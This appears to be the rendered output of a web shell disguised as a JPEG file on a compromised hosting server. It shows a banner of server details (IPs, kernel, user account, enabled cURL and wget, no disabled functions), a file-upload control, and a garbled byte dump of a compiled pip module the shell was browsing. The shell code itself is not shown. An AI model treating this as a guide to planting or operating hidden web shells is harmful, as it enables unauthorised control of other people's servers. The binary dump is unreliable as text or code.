���� JFIF fdasasfas213sdaf
Server IP : 93.127.173.49 / Your IP : 216.73.216.210 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/opt/alt/python27/lib/python2.7/site-packages/pip/_internal/distributions/ |
Upload File : |
� u�fc @ s� d d l Z d d l m Z d d l m Z e ru d d l m Z d d l m Z d d l m Z d d l m Z n e e j � d e f d � � Y� Z d S( i����N( t add_metaclass( t MYPY_CHECK_RUNNING( t Optional( t Distribution( t PackageFinder( t InstallRequirementt AbstractDistributionc B s; e Z d Z d � Z e j d � � Z e j d � � Z RS( s A base class for handling installable artifacts. The requirements for anything installable are as follows: - we must be able to determine the requirement name (or we can't correctly handle the non-upgrade case). - for packages with setup requirements, we must also be able to determine their requirements without installing additional packages (for the same reason as run-time dependencies) - we must be able to create a Distribution object exposing the above metadata. c C s t t | � j � | | _ d S( N( t superR t __init__t req( t selfR ( ( sQ /opt/alt/python27/lib/python2.7/site-packages/pip/_internal/distributions/base.pyR ! s c C s t � � d S( N( t NotImplementedError( R ( ( sQ /opt/alt/python27/lib/python2.7/site-packages/pip/_internal/distributions/base.pyt get_pkg_resources_distribution&